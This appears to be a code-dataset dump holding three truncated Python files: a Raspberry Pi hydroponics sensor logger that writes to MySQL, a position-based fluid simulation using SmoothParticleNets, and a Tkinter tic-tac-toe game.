input stringlengths 2.65k 237k | output stringclasses 1
value |
|---|---|
<reponame>dombold/MyHydropi-Blog<filename>Website_Code/Sensors/Hydropi_Sensors_Only.py<gh_stars>0
#!/usr/bin/env python
##############################################################################
#
# Written by <NAME> for the Raspberry Pi - 2016
#
# Website: myhydropi.com
# Contact: <EMAIL>
#
# Feel free to use and modify this code for you own use in any way.
#
# This program is designed to provide the following features and should be run
# initially from the command line so that a couple of configuration errors can
# be tested for and warnings provided on screen:
#
# 1. Read Multiple Sensors - DS18B20 1-wire type Temperature sensors, Atlas
# Scientific Temperature, pH, Oxidation Reduction Potential (ORP) and
# Electrical Conductivity sensors and save the results to a MySQL database at
# a set interval with a set level of accuracy. Multiple sensors of the same
# type can also be used by configuring the "sensors" variable with the correct
# sensor type. A reference temperature reading will be set by one of the
# temperature sensors if any are connected, if not a value of 25C will be
# applied. This is necessary to ensure accurate readings from the other
# sensors as the liquid being tested changes temperature.
# The electrical conductivity reading is also converted to parts per million.
# There is also a customizible "pause" setting included to stop readings while
# chemicals are being added, this prevents spikes in the readings for more
# accurate results.
#
# 2. The program will also create the initial database and tables if they do
# not already exist in MySQL.
#
# For Python 3 I have used python-mysqldb module to connect to the database.
# to add the module you need to enter the following commands
#
# sudo apt install python-mysqldb
#
##############################################################################
import io
import os
import sys
import fcntl
import mysql.connector as mariadb
from time import sleep
from collections import OrderedDict
# Uncomment sleep if running program at startup with crontab
#sleep(10)
# Load Raspberry Pi Drivers for 1-Wire Temperature Sensor
# (modprobe is a no-op if the w1-gpio/w1-therm modules are already loaded)
os.system('modprobe w1-gpio')
os.system('modprobe w1-therm')
# Define Atlas Scientific Sensor Class
class atlas_i2c:
    """Minimal I2C driver for Atlas Scientific EZO sensor boards.

    Opens separate unbuffered read/write handles on the Linux i2c-dev
    device and implements the ASCII command/response protocol the boards
    use. Call close() when finished to release the file handles.
    """
    long_timeout = 1.5  # the timeout needed to query readings & calibrations
    short_timeout = .5  # timeout for regular commands
    default_bus = 1  # the default bus for I2C on the newer Raspberry Pis,
    # certain older boards use bus 0
    default_address = 102  # the default address for the Temperature sensor

    def __init__(self, address=default_address, bus=default_bus):
        # open two file streams, one for reading and one for writing
        # the specific I2C channel is selected with the bus
        # it is usually 1, except for older revisions where its 0
        # wb and rb indicate binary read and write
        self.file_read = io.open("/dev/i2c-" + str(bus), "rb", buffering=0)
        self.file_write = io.open("/dev/i2c-" + str(bus), "wb", buffering=0)
        # initializes I2C to either a user specified or default address
        self.set_i2c_address(address)

    def set_i2c_address(self, addr):
        # set the I2C communications to the slave specified by the address
        # The commands for I2C dev using the ioctl functions are specified in
        # the i2c-dev.h file from i2c-tools
        I2C_SLAVE = 0x703
        fcntl.ioctl(self.file_read, I2C_SLAVE, addr)
        fcntl.ioctl(self.file_write, I2C_SLAVE, addr)

    def write(self, string):
        # appends the null character and sends the string over I2C
        string += "\00"
        self.file_write.write(bytes(string, 'UTF-8'))

    def read(self, num_of_bytes=31):
        """Read up to num_of_bytes from the board and decode the response.

        The first byte is a status code (1 == success); the remainder is a
        NUL-terminated ASCII payload.
        """
        res = self.file_read.read(num_of_bytes)  # read from the board
        response = list(res)  # bytes iterate as ints on Python 3
        if response[0] == 1:  # if the response isnt an error
            # change MSB to 0 for all received characters except the first
            # and get a list of characters
            char_list = [chr(x & ~0x80) for x in response[1:]]
            # NOTE: having to change the MSB to 0 is a glitch in the
            # raspberry pi, and you shouldn't have to do this!
            # convert the char list to a string, truncated at the first NUL
            return ''.join(char_list).split('\x00')[0]
        else:
            # BUG FIX: response[0] is already an int on Python 3, so the old
            # ord(response[0]) raised TypeError instead of reporting the code.
            return "Error " + str(response[0])

    def query(self, string):
        # write a command to the board, wait the correct timeout,
        # and read the response
        self.write(string)
        # the read and calibration commands require a longer timeout
        cmd = string.upper()
        if cmd.startswith("R") or cmd.startswith("CAL"):
            sleep(self.long_timeout)
        elif cmd.startswith("SLEEP"):
            return "sleep mode"
        else:
            sleep(self.short_timeout)
        return self.read()

    def close(self):
        self.file_read.close()
        self.file_write.close()
# Check that only one Primary Temperature sensor is defined
def check_for_only_one_reference_temperature():
    """Abort with a warning if more than one temperature sensor is marked
    as the primary (reference) sensor in the global ``sensors`` config."""
    ref_count = sum(
        1
        for cfg in sensors.values()
        if cfg["is_connected"] is True
        and cfg["sensor_type"] in ("1_wire_temp", "atlas_temp")
        and cfg["is_ref"] is True
    )
    if ref_count > 1:
        os.system('clear')
        print("\n\n !!!! WARNING !!!!\n\n"
              "You can only have one Primary Temperature sensor, Please set the\n"
              "Temperature sensor that is in the liquid you are testing to True\n"
              "and the other to False\n\n !!!! WARNING !!!!\n\n")
        sys.exit()  # Stop program
    return
# Create required database in the MySQL if it doesn't' already exist
def create_database():
    """Create the configured database if it does not already exist.

    Connection credentials (username/password/servername/dbname) come from
    module-level globals.
    """
    connection = mariadb.connect(user=username,
                                 password=password,
                                 host=servername)
    cursor = connection.cursor()
    try:
        cursor.execute("SET sql_notes = 0; ")  # Hide Warnings
        cursor.execute("CREATE DATABASE IF NOT EXISTS {}".format(dbname))
        cursor.execute("SET sql_notes = 1; ")  # Show Warnings
    except mariadb.Error as error:
        print("Error: {}".format(error))
    connection.commit()
    connection.close()
    return
def open_database_connection():
    """Connect to the hydropi database and return (connection, cursor)."""
    connection = mariadb.connect(user=username,
                                 password=password,
                                 host=servername,
                                 database=dbname)
    cursor = connection.cursor()
    try:
        cursor.execute("SET sql_notes = 0; ")  # Hide Warnings
    except mariadb.Error as error:
        print("Error: {}".format(error))
    return connection, cursor
def close_database_connection(conn, curs):
    """Re-enable SQL warnings, commit pending writes and close *conn*."""
    try:
        curs.execute("SET sql_notes = 1; ")  # Show Warnings
    except mariadb.Error as error:
        print("Error: {}".format(error))
    conn.commit()
    conn.close()
def create_sensors_table():
    """Ensure the ``sensors`` table exists, with one DECIMAL(10,2) column per
    connected sensor (columns for already-existing sensors raise a warning
    that is printed and ignored)."""
    conn, curs = open_database_connection()
    try:
        curs.execute("CREATE TABLE IF NOT EXISTS sensors (timestamp DATETIME);")
    except mariadb.Error as error:
        print("Error: {}".format(error))
    for cfg in sensors.values():
        if cfg["is_connected"] is not True:
            continue
        try:
            curs.execute("ALTER TABLE sensors ADD {} DECIMAL(10,2);"
                         .format(cfg["name"]))
        except mariadb.Error as error:
            print("Error: {}".format(error))
    close_database_connection(conn, curs)
    return
def remove_unused_sensors():
    """Drop the table column of every sensor marked as not connected
    (errors for already-missing columns are printed and ignored)."""
    conn, curs = open_database_connection()
    for cfg in sensors.values():
        if cfg["is_connected"] is not False:
            continue
        try:
            curs.execute("ALTER TABLE sensors DROP {};"
                         .format(cfg["name"]))
        except mariadb.Error as error:
            print("Error: {}".format(error))
    close_database_connection(conn, curs)
    return
# Read in the data from the Temp Sensor file
def read_1_wire_temp_raw(temp_num):
    """Return all lines of the DS18B20 sysfs file for sensor *temp_num*.

    The file path comes from the global ``sensors`` configuration dict.
    """
    # BUG FIX: use a context manager so the file handle is released even if
    # readlines() raises (the old open/readlines/close leaked on error).
    with open(sensors[temp_num]["ds18b20_file"], 'r') as f:
        return f.readlines()
# Process the Temp Sensor file for errors and convert to degrees C
def read_1_wire_temp(temp_num):
    """Read one DS18B20 temperature in degrees Celsius.

    Re-reads the sysfs file until its CRC line ends in 'YES', then parses
    the millidegree value after 't='.

    Raises:
        ValueError: if the 't=' marker is missing from the data line.
    """
    lines = read_1_wire_temp_raw(temp_num)
    # Wait for a valid CRC before trusting the reading.
    while lines[0].strip()[-3:] != 'YES':
        sleep(0.2)
        lines = read_1_wire_temp_raw(temp_num)
    equals_pos = lines[1].find('t=')
    if equals_pos == -1:
        # BUG FIX: previously fell through to `return temp_curr` with the
        # variable unbound (NameError). Raise explicitly instead; callers
        # already wrap this in try/except and substitute a fallback value.
        raise ValueError("no 't=' field in 1-wire sensor data")
    temp_string = lines[1][equals_pos + 2:]
    # Use line below for Celsius
    temp_curr = float(temp_string) / 1000.0
    #Uncomment line below for Fahrenheit
    #temp_curr = ((float(temp_string) / 1000.0) * (9.0 / 5.0)) + 32
    return temp_curr
# read and log each sensor if it is set to True in the sensors list
def log_sensor_readings(all_curr_readings):
    """Insert a timestamped row into the sensors table and fill in readings.

    *all_curr_readings* is a list of [column_name, value] pairs produced by
    read_sensors().
    """
    conn, curs = open_database_connection()
    try:
        curs.execute("INSERT INTO sensors (timestamp) VALUES(now());")
        curs.execute("SELECT MAX(timestamp) FROM sensors")
        # BUG FIX: fetchone() used to run outside the try block, so after a
        # swallowed execute() error it crashed with an unrelated exception.
        last_timestamp = curs.fetchone()[0].strftime('%Y-%m-%d %H:%M:%S')
    except mariadb.Error as error:
        print("Error: {}".format(error))
        close_database_connection(conn, curs)
        return
    for readings in all_curr_readings:
        try:
            # Column names cannot be bound as SQL parameters, but the value
            # and timestamp now are (instead of string interpolation).
            curs.execute("UPDATE sensors SET {} = %s WHERE timestamp = %s"
                         .format(readings[0]), (readings[1], last_timestamp))
        except mariadb.Error as error:
            print("Error: {}".format(error))
    close_database_connection(conn, curs)
    return
def read_sensors():
    """Poll all connected sensors once and log the readings to MySQL.

    A temperature sensor flagged "is_ref" supplies the reference temperature
    written to the Atlas Scientific EC/pH/ORP sensors before they are read;
    25C is used when no reference sensor is available. On a read failure an
    out-of-band fallback value is logged so gaps show up in the data.
    """
    all_curr_readings = []
    ref_temp = 25  # default reference temperature (C) until a ref sensor reports
    # Get the readings from any 1-Wire temperature sensors
    for key, value in sensors.items():
        if value["is_connected"] is True:
            if value["sensor_type"] == "1_wire_temp":
                try:
                    sensor_reading = (round(float(read_1_wire_temp(key)),
                                            value["accuracy"]))
                except:
                    sensor_reading = 50  # fallback: flags a failed probe read
                all_curr_readings.append([value["name"], sensor_reading])
                if value["is_ref"] is True:
                    ref_temp = sensor_reading
            # Get the readings from any Atlas Scientific temperature sensors
            # NOTE(review): check_for_only_one_reference_temperature() matches
            # sensor_type "atlas_temp", not "atlas_scientific_temp" - one of
            # the two spellings is probably stale; confirm against the sensors
            # configuration dict.
            if value["sensor_type"] == "atlas_scientific_temp":
                device = atlas_i2c(value["i2c"])
                try:
                    sensor_reading = round(float(device.query("R")),
                                           value["accuracy"])
                except:
                    sensor_reading = 50
                all_curr_readings.append([value["name"], sensor_reading])
                if value["is_ref"] is True:
                    ref_temp = sensor_reading
            # Get the readings from any Atlas Scientific Elec Conductivity sensors
            if value["sensor_type"] == "atlas_scientific_ec":
                device = atlas_i2c(value["i2c"])
                # Set reference temperature value on the sensor
                device.query("T," + str(ref_temp))
                try:
                    # Reading is converted to parts per million via the
                    # configured ppm_multiplier.
                    sensor_reading = (round(((float(device.query("R"))) *
                                             value["ppm_multiplier"]), value["accuracy"]))
                except:
                    sensor_reading = 10000
                all_curr_readings.append([value["name"], sensor_reading])
            # Get the readings from any other Atlas Scientific sensors
            if value["sensor_type"] == "atlas_scientific":
                device = atlas_i2c(value["i2c"])
                # Set reference temperature value on the sensor
                device.query("T," + str(ref_temp))
                try:
                    sensor_reading = round(float(device.query("R")),
                                           value["accuracy"])
                except:
                    # Per-sensor fallback values so failures stand out.
                    # NOTE(review): a failing sensor named neither "ph" nor
                    # "orp" leaves sensor_reading unbound here (NameError).
                    if value["name"] == "ph":
                        sensor_reading = 2
                    elif value["name"] == "orp":
                        sensor_reading = 1000
                all_curr_readings.append([value["name"], sensor_reading])
    log_sensor_readings(all_curr_readings)
    return
# Configuration Settings
# Define the sensor names, what sensors | |
<filename>examples/fluid_sim.py<gh_stars>0
"""
An example of a fluid simulation built using this library. The FluidSim class below implements
Position Based Fluids. The main function sets up and runs the simulation. Unfortunately this
library does not come with any visualization tools, so it only prints the average position of
the particles. However it should be easy to hook up to an outside viewer if so desired.
This file takes no command line arguments, so you can just run it as is.
"""
import numpy as np
import SmoothParticleNets as spn
import torch
from torch.autograd import Variable
import torch.nn as nn
import pdb
# Default simulation parameters (see the FluidSim docstring for details).
NSUBSTEPS = 1                   # simulation substeps per forward() call
DT = 1.0/60                     # simulated seconds per forward() call
STIFFNESS = 2.99e-11            # pressure-offset constant (recomputed at init)
DENSITY_REST = 17510.1          # rest density (recomputed at init)
GRAVITY = [0, -9.8, 0]          # default gravity vector
MAX_VEL = 0.5*0.1*NSUBSTEPS/DT  # cap on particle speed magnitude
COHESION = 0.1                  # cohesion constant (trainable)
VISCOSITY = 60.0                # viscosity constant (trainable)
SURFACE_TENSION = 0.0           # surface tension constant (trainable)
SURFACE_CONSTRAINT_SCALE = 168628.0
MAX_ACC = 0.833                 # cap on particle acceleration magnitude
NUM_ITERATIONS = 3              # constraint-solver iterations per step
RELAXATION = 1.0                # divisor applied to constraint deltas
DAMP = 1.0                      # damping factor on constraint deltas
COLLISION_DISTANCE = 0.00125    # particle/object contact threshold
NUM_STATIC_ITERATIONS = 1       # substeps when sweeping movement for collisions
NUM_FIX_ITERATIONS = NUM_STATIC_ITERATIONS
FLUID_REST_DISTANCE = 0.55      # rest spacing as a ratio of the particle radius
# A helper class to create a set of ConvSDF layers with different sized kernels for
# computing numerical gradients.
class GradConvSDF(nn.Module):
    """Numerical SDF gradient via central differences.

    Builds one ConvSDF per coordinate axis with a kernel of size 3 along
    that axis (1 elsewhere) and weights -1/(2*dilation) and +1/(2*dilation),
    so each layer evaluates the central-difference derivative of the SDF
    along its axis.
    """

    def __init__(self, sdfs, sdf_sizes, ndim, max_distance):
        super(GradConvSDF, self).__init__()
        self.ndim = ndim
        self.convsdfgrad = []
        for d in range(ndim):
            # Kernel size 3 along axis d, 1 along every other axis.
            ks = [1]*ndim
            ks[d] = 3
            dilation = 0.0005  # finite-difference step size
            convsdf = spn.ConvSDF(sdfs, sdf_sizes, 1, ndim, kernel_size=ks, dilation=dilation,
                                  max_distance=max_distance, with_params=False, compute_pose_grads=True)
            convsdf.weight.data.fill_(0)
            convsdf.weight.data[0, 0] = -1/(2*dilation)
            convsdf.weight.data[0, 2] = 1/(2*dilation)
            convsdf.bias.data.fill_(0)
            self.convsdfgrad.append(convsdf)
            # Register the layer as a submodule under the same name the old
            # exec() call used; setattr is equivalent and analyzable. The
            # unused `kernel_size` local was dropped.
            setattr(self, "convsdfgrad%d" % d, convsdf)

    def forward(self, locs, idxs, poses, scales):
        # Concatenate the per-axis derivatives along the channel dimension.
        return torch.cat([self.convsdfgrad[d](locs, idxs, poses, scales)
                          for d in range(self.ndim)], 2)
class FluidSim(nn.Module):
def __init__(self, sdfs, sdf_sizes, radius, ndim, with_params=[], init_params={}):
    """
    Initializes a fluid simulation model.
    Arguments:
        sdfs: A list of SDFs for all objects in the simulation. This argument is passed directly as the sdfs
              argument of ConvSDF. Refer to the documentation of that layer for details.
        sdf_sizes: A list of the sizes for the sdfs argument. This argument is also passed directy to ConvSDF.
                   Refer to the documentation for that layer for details.
        radius: The particle interaction radius. Particles that are further than this apart do not
                interact. Larger values for this parameter slow the simulation significantly.
        ndim: The dimensionality of the coordinate space in the simulation. Only 2 or 3 is supported, and only
              3 has been tested.
        with_params: (optional) List of parameter names. These will be the trainabale parameters in this
                     module. See below for a list of parameters. Only parameters labelled as trainable may
                     appear in this list.
        init_params: A dictionary mapping parameter names to values to initialize them with. See below for a
                     list of parameters. If a parameter does not appear in this list, it is initialized with
                     its default value. Default values are listed at the top of the file.
    Parameters:
        nSubsteps: Each call to forward will divide the simulation time by this value and run it this many
                   times. Useful when it is desired to call the sim multiple times per timestep.
        dt: The amount of time that elapses during one forward call. This is used to scale the various
            simulation parameters.
        stiffness: A parameter controlling how the pressure offset is computed. It is not recommended to
                   change this from the default.
        maxSpeed: The maximum magnitude of the particle velocities. Higher velocities are clamped.
        cohesion[trainable]: The cohesion constant.
        viscosity[trainable]: The viscosity constant.
        surfaceTension[trainable]: The surface tension constant.
        numIterations: The number of constraint solver iterations to do per simulation step.
        relaxationFactor: The value to divide the constraint solution deltas by to "relax" the solver.
        damp: The factor to dampen the constraint solution deltas by.
        collisionDistance: When a particle is closer than this to an object, it is considered colliding.
        numStaticIterations: When moving particles or objects, this is the number of substeps that
                             movement is split into to check for collisions. The higher this value, the
                             less likely it is that particles will clip through objects but the slower
                             the simulation is.
        fluidRestDistance: The distancce fluid particles should be from each other at rest, expressed
                           as a ratio of the radius.
    """
    super(FluidSim, self).__init__()
    self.all_params = {
        "nSubsteps": NSUBSTEPS,
        "dt": DT,
        "stiffness": STIFFNESS,
        "density_rest": DENSITY_REST,
        "maxSpeed": MAX_VEL,
        "cohesion": COHESION,
        "viscosity": VISCOSITY,
        "surfaceTension": SURFACE_TENSION,
        "surfaceConstraintScale": SURFACE_CONSTRAINT_SCALE,
        "maxAcceleration": MAX_ACC,
        "numIterations": NUM_ITERATIONS,
        "relaxationFactor": RELAXATION,
        "damp": DAMP,
        "collisionDistance": COLLISION_DISTANCE,
        "numStaticIterations": NUM_STATIC_ITERATIONS,
        "numFixIterations": NUM_FIX_ITERATIONS,
        "fluidRestDistance": FLUID_REST_DISTANCE*radius,
    }
    self.radius = radius
    self.ndim = ndim
    # Recomputes density_rest and stiffness from the rest packing.
    self._calculate_rest_density(init_params.get(
        "fluidRestDistance", self.all_params["fluidRestDistance"]))
    # The largest SDF value bounds how far ConvSDF ever needs to look.
    max_distance = max([sdf.max().item()
                        for sdf in sdfs]) if len(sdfs) else 1e5
    if not len(sdfs):
        # Substitute a single 1-cell dummy SDF so the layers below always
        # receive at least one SDF.
        sdfs = [torch.from_numpy(
            np.zeros([1]*self.ndim, dtype=np.float32)), ]
        sdf_sizes = [1, ]
    self.coll = spn.ParticleCollision(
        ndim, radius, max_collisions=128, include_self=False)
    self.reorder_un2sort = spn.ReorderData(reverse=False)
    self.reorder_sort2un = spn.ReorderData(reverse=True)
    self.convsdfgrad = GradConvSDF(
        sdfs, sdf_sizes, ndim, max_distance=max_distance)
    # Identity ConvSDF with weight -1: outputs the negated SDF value, i.e.
    # positive when a particle is inside an object.
    self.convsdfcol = spn.ConvSDF(sdfs, sdf_sizes, 1, ndim, 1, 1,
                                  max_distance=max_distance, with_params=False, compute_pose_grads=True)
    self.convsdfcol.weight.data.fill_(-1)
    self.convsdfcol.bias.data.fill_(0)
    self.relu = nn.ReLU()
    # One identity-initialized ConvSP per (kernel_fn, channels, dis_norm)
    # combination, so each layer simply evaluates its smoothing kernel.
    layer_types = [
        ('dspiky', 1, True),
        ('dspiky', ndim, True),
        ('constant', 1, False),
        ('constant', ndim, False),
        ('spiky', 1, False),
        ('spiky', ndim, False),
        ('cohesion', 1, True),
        ('cohesion', ndim, True),
    ]
    for kernel, dim, normed in layer_types:
        conv = spn.ConvSP(dim, dim, ndim, kernel_size=1, dilation=1, radius=radius,
                          dis_norm=normed, with_params=False, kernel_fn=kernel)
        conv.bias.data.fill_(0)
        conv.weight.data.fill_(0)
        for i in range(dim):
            conv.weight.data[i, i, 0] = 1
        # setattr replaces the old exec() call; the attribute names (e.g.
        # "spikyD", "dspiky1normd") are unchanged.
        name = "%s%s%s" % (kernel, "D" if dim == ndim else str(dim),
                           "normd" if normed else "")
        setattr(self, name, conv)
    self.register_buffer("ones", Variable(torch.zeros(1)))
    self.register_buffer("gravity", Variable(torch.from_numpy(
        np.array(init_params.get("gravity", GRAVITY),
                 dtype=np.float32).reshape((1, 1, -1))), requires_grad=False))
    self.unroll = 0
    self.param_dict = {}
    for p, init_val in self.all_params.items():
        if init_params is not None and p in init_params:
            init_val = init_params[p]
        # Base value stored as "_<name>"; when the name is in with_params a
        # trainable parameter of the same name (initialized to 1.0) acts as
        # a multiplicative scale on the base value.
        setattr(self, "_"+p, init_val)
        if p in with_params:
            v = 1.0
            self.register_parameter(p, torch.nn.Parameter(torch.from_numpy(
                np.array([v], dtype=np.float32))))
def _calculate_rest_density(self, fluidRestDistance):
    """Derive density_rest and stiffness from an ideal rest packing.

    Sums the spiky kernel (and the squared kernel derivative) over the
    neighbour distances of an optimally packed sphere of particles, then
    stores the results in self.all_params.
    """
    neighbours = np.array(self._tight_pack3D(
        self.radius, fluidRestDistance, 2048))
    distances = np.sqrt(np.sum(neighbours**2, axis=1))
    density = 0
    deriv_sq = 0
    for dist in distances:
        density += spn.KERNEL_FN["spiky"](dist, self.radius)
        deriv_sq += spn.KERNEL_FN["dspiky"](dist, self.radius)**2
    self.all_params["density_rest"] = float(density)
    self.all_params["stiffness"] = float(1.0/deriv_sq)
# Generates an optimally dense sphere packing at the origin (implicit sphere at the origin)
def _tight_pack3D(self, radius, separation, maxPoints):
dim = int(np.ceil(1.0*radius/separation))
points = []
for z in range(-dim, dim+1):
for y in range(-dim, dim+1):
for x in range(-dim, dim+1):
xpos = x*separation + \
(separation*0.5 if ((y+z) & 1) else 0.0)
ypos = y*np.sqrt(0.75)*separation
zpos = z*np.sqrt(0.75)*separation
# skip center
if xpos**2 + ypos**2 + zpos**2 == 0.0:
continue
if len(points) < maxPoints and np.sqrt(xpos**2 + ypos**2 + zpos**2) <= radius:
points.append([xpos, ypos, zpos])
return points
def SetSDFs(self, sdfs, sdf_sizes):
    """Replace the rigid-object SDF set on every ConvSDF layer."""
    if not len(sdfs):
        # Substitute a 1-cell dummy SDF so layers always receive one.
        sdfs = [torch.from_numpy(
            np.zeros([1]*self.ndim, dtype=np.float32)), ]
        sdf_sizes = [1, ]
    self.convsdfcol.SetSDFs(sdfs, sdf_sizes)
    for axis in range(self.ndim):
        getattr(self.convsdfgrad, "convsdfgrad%d" % axis).SetSDFs(sdfs, sdf_sizes)
def _cap_magnitude(self, A, cap):
d = len(A.size())
vv = torch.norm(A, 2, d-1, keepdim=True)
vv = cap/(vv + 0.0001)
vv = -(self.relu(-vv + 1.0) - 1.0)
return A*vv
def _interp_poses(self, last_poses, poses, t):
lq = last_poses[:, :, -4:]
pq = poses[:, :, -4:]
lt = last_poses[:, :, :-4]
pt = poses[:, :, :-4]
# Compute the quaternion dot product.
dot = torch.sum(lq*pq, 2, keepdim=True).data
dot[dot < 0] = -1
dot[dot >= 0] = 1
dot = Variable(dot, requires_grad=False)
# Multiply negative dot product quaternions by -1.
q = pq*dot
# Linearly interpolate.
rt = (pt - lt)*t + lt
rq = (pq - lq)*t + lq
q = rq/torch.sqrt(torch.sum(rq**2, 2, keepdim=True))
ret = torch.cat((rt, rq), 2)
return ret
def _fix_static_collisions(self, locs, idxs, poses, scales, collisionDistance):
    """Project penetrating particles out of static object geometry.

    convsdfcol has weight -1, so `mtd` is positive for particles inside
    (or within collisionDistance of) an object; those particles are pushed
    out along the normalized SDF gradient.
    """
    ret = locs
    mtd = self.convsdfcol(ret, idxs, poses, scales) + collisionDistance
    # relu keeps only the penetrating particles. NOTE(review): the second
    # term is multiplied by 0.0 and contributes nothing to the value -
    # presumably a leftover clamping experiment; confirm before removing.
    intersect = self.relu(
        mtd) + self.relu(-self.relu(-(mtd - 0.5)) + 0.5)*0.0
    # Push-out direction from the numerical SDF gradient.
    sdfgrad = self.convsdfgrad(ret, idxs, poses, scales)
    sdfgrad = torch.nn.functional.normalize(sdfgrad, dim=2, eps=1e-5)
    ret = ret + intersect*sdfgrad
    return ret
def fixStaticCollisions(self, locs, new_locs, idxs, poses, scales):
    """Move particles from *locs* toward *new_locs* in substeps, resolving
    static-object collisions after each substep.

    Each simulation parameter's effective value is its stored "_<name>"
    base value, multiplied by the same-named trainable parameter when one
    was registered.
    """
    # BUG FIX: the original wrote the resolved values with
    # exec("<name> = val"), which cannot create readable function locals in
    # Python 3, so the later name lookups raised NameError. Collect the
    # resolved values in a dict instead.
    params = {}
    for p in self.all_params:
        scale = getattr(self, p) if hasattr(self, p) else 1
        params[p] = getattr(self, "_"+p)*scale
    n_steps = params["numStaticIterations"]
    delta = (new_locs - locs)/n_steps
    for _ in range(n_steps):
        locs = locs + delta
        locs = self._fix_static_collisions(locs, idxs, poses,
                                           scales, params["collisionDistance"])
    return locs
def forward(self, locs, vel, idxs, poses, last_poses, scales, extra_constraints=None):
"""
Compute one forward timestep of the fluid simulation. It takes as input the current
fluid state (locs, vel) as well as the state of rigid objects | |
<reponame>Saadmairaj/TKtictac<filename>__main__.py<gh_stars>1-10
## DISCLAIMER: This was my first ever game after learning the basic of python so the current .py file is not optimized
# Public version string of the game.
__version__ = '0.0.2'
import platform
import random as rnd
from tkinter import *
from tkinter import ttk
from tkinter.font import Font
from tkinter.messagebox import *
from pygame.mixer import init, music
from Tk_Loop import GuiLoop
from Titlebar import TitleBar
from TkExtra import Canvas, grid
import tkinter.font as font
import tkmacosx as tkm
# Common button options
# Shared keyword defaults for the game's buttons.
# NOTE(review): 'borderless'/'overbackground' and the two-value
# activebackground tuple look tkmacosx-specific (tkm is imported above) -
# confirm against the tkmacosx docs before porting to plain tkinter/ttk.
button_options = dict(
    borderless=1,
    takefocus=0,
    activebackground=('white', 'black'),
    overbackground='#3d4246',
    font=('Avenir'),
)
class FrameBody(Tk):
    """Main application window.

    Builds the left scoreboard/options panel and the game canvas, owns the
    board state shared with the Bot AI and the _drawings canvas, and runs
    the colour-cycling animation and win-detection background loops.
    """
    def __init__(self, *args, **kwargs):
        Tk.__init__(self)
        self.option_add("*Font", ('Avenir'))
        self.py = init()  # start the pygame mixer for sound effects
        self.tb = TitleBar(self, "TicTacToe", False) # if enabled use self.geometry("500x325+300+200")
        self.tb.icon('./assets/icon.icns')
        self.tb.dark_mode()
        # NOTE(review): 'dummy.mp3' looks like a placeholder sound asset - confirm.
        self.Load = music.load('dummy.mp3')
        self.Move = True           # False while a newly placed mark is animating
        self.off = True            # sound-effects-enabled flag
        self.Restarting = True     # False while a finished round is resetting
        self._Turn = 'h'           # NOTE(review): not read anywhere in this file - confirm
        self.Round = 1
        self.BgBlack = "black"
        self.BgWhite = "white"
        self.difficulty = "unbeatable"
        self.PlScr = 0             # player's score
        self.CpScr = 0             # computer's score
        self.Effect = True         # current blink visibility state (Effects)
        self.EffectCount = 0       # blink toggles performed so far
        self.EffectCurrent = None  # canvas item currently blinking
        self.EffectLoop = 0        # after() id of the running blink loop
        self.configure(highlightbackground=self.BgWhite, highlightcolor=self.BgWhite, highlightthickness=3)
        self.title('TicTacToe')
        self.resizable(False, False)
        self.geometry("500x325+300+200")
        self.configure(bg=self.BgBlack)
        # Left-hand panel: scores, difficulty and round labels.
        self.options = Frame(self, bg=self.BgBlack, width=150)
        self.options.config(highlightbackground=self.BgWhite, highlightcolor=self.BgWhite, highlightthickness=1)
        self.options.grid_propagate(1)
        self.options.pack(side=LEFT, fill=Y)
        self._Grid(root=self.options, row=15, col=3)
        self.Score = Label(self.options, text='Score', fg=self.BgWhite, bg=self.BgBlack)
        self.Score.config(font=Font(size=35, underline=True, family='Savoye LET', slant='italic'))
        self.Score.grid(row=0, columnspan=4, padx=10)
        self.Player = Label(self.options, text="Player", fg=self.BgWhite, bg=self.BgBlack)
        self.Player.grid(row=1, column=0, padx=10, sticky=SW)
        self.Computer = Label(self.options, text="Computer", fg=self.BgWhite, bg=self.BgBlack)
        self.Computer.grid(row=1, column=3, padx=10, sticky=SE)
        self.PlayerScore = Label(self.options, text='0', fg=self.BgWhite, bg=self.BgBlack)
        self.PlayerScore.grid(row=2, column=0, padx=20, sticky=NSEW)
        self.ComputerScore = Label(self.options, text='0', fg=self.BgWhite, bg=self.BgBlack)
        self.ComputerScore.grid(row=2, column=3, padx=20, sticky=NSEW)
        self.DiffLB1 = Label(self.options, fg=self.BgWhite, bg=self.BgBlack)
        self.DiffLB1.config(text="Difficulty:")
        self.DiffLB1.grid(row=9, columnspan=4, padx=10, sticky=S)
        self.DiffLB2 = Label(self.options, fg=self.BgWhite, bg=self.BgBlack)
        self.DiffLB2.config(text=self.difficulty.capitalize())
        self.DiffLB2.config(font=Font(weight="bold"))
        self.DiffLB2.grid(row=10, columnspan=4, padx=10, sticky=N)
        self.RoundLB = Label(self.options, text=("Round: {}".format(self.Round)), fg=self.BgWhite, bg=self.BgBlack)
        self.RoundLB.grid(row=5, columnspan=4, padx=10)
        # Board state: cell index -> None (free), "O" (player) or "X" (computer).
        self._Data = {0: None, 1: None, 2: None, 3: None, 4: None, 5: None, 6: None, 7: None, 8: None}
        self.Draw = _drawings(self, background=self.BgBlack)
        self.Draw.pack(side=LEFT)
        self.Ai = Bot(self, difficulty=self.difficulty)
        self.Setting = Settings(self)
        self.bind("<Button-1>", self.Turn)
        # Background loops (every 100 ms): colour cycling and win detection.
        self.AniLoop = GuiLoop(self, self.RandomHexCode, speed=100)
        self.Win_ChkLoop = GuiLoop(self, self.win_check, speed=100)

    def Sound_Effect(self, state=True):
        # Play the loaded click sound when sound is enabled.
        if state and self.off:
            music.play()
        else: return

    def RandomHexCode(self, whatever=None):
        # Recolour the title, the first four canvas items (the board grid)
        # and the window highlight with one random colour per tick.
        r = lambda: rnd.randint(0, 255)
        color = ('#%02X%02X%02X' % (r(), r(), r()))
        self.Score.configure(fg=color)
        self.Setting.headinglb['fg'] = color
        for i in (1, 2, 3, 4): self.Draw.itemconfig(i, fill=color)
        self.config(highlightcolor=color)

    def _Grid(self, root, row, col):
        # Give every row/column of *root* an equal resize weight.
        for y in range(col):
            Grid.columnconfigure(root, y, weight=1)
        for x in range(row):
            Grid.rowconfigure(root, x, weight=1)

    def Turn(self, evt=None):
        # Left-click handler: let the human move, then queue the AI's reply.
        if self.Restarting:
            if self.Draw.Human(evt=evt):
                self.after(615, lambda: self.Ai.Move())

    def Effects(self):
        # Blink the most recently placed mark, locking input (self.Move)
        # until the animation finishes.
        Stop = False
        self.Move = False
        if self.EffectCount <= 5:
            if self.Effect:
                self.Draw.itemconfig(self.EffectCurrent, state='hidden')
                self.Effect = False
            else:
                self.Draw.itemconfig(self.EffectCurrent, state='normal')
                self.Effect = True
            self.EffectCount += 1
        else:
            self.EffectCount = 0
            self.after_cancel(self.EffectLoop)
            self.Move = True
